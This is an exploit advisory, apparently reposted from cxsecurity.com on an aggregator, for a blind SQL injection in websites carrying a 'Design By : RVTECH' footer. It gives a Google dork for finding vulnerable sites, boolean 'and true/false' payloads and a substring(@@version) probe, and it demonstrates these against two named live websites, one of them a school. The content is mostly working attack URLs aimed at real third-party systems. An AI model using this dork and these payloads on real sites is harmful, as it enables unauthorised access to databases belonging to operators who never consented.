Design By : RVTECH - Blind Sql Injection Vulnerability
文章揭示了由RVTECH设计的网站中存在的盲SQL注入漏洞。通过在URL参数末尾添加"and true"或"and false"可测试漏洞存在性,并附带了具体示例链接以演示该问题。 2025-5-13 20:56:14 Author: cxsecurity.com(查看原文) 阅读量:9 收藏

********************************************************* #Exploit Title: Design By : RVTECH - Blind Sql Injection Vulnerability #Date: 2025-05-11 #Exploit Author: Behrouz Mansoori #Google Dork: "Design By : RVTECH" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20true-- * https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20false-- * https://www.rainbowpublicschool.org/albumimages.php?id=4%20and%20/*!12345substring(@@version,1,1)*/=5-- ### Demo 2: * ttp://cabstrindia.com/product_category.php?id=6%20and%20true-- * ttp://cabstrindia.com/product_category.php?id=6%20and%20false-- * http://cabstrindia.com/product_category.php?id=6%20and%20/*!12345substring(@@version,1,1)*/=5-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025050033
如有侵权请联系:admin#unsafe.sh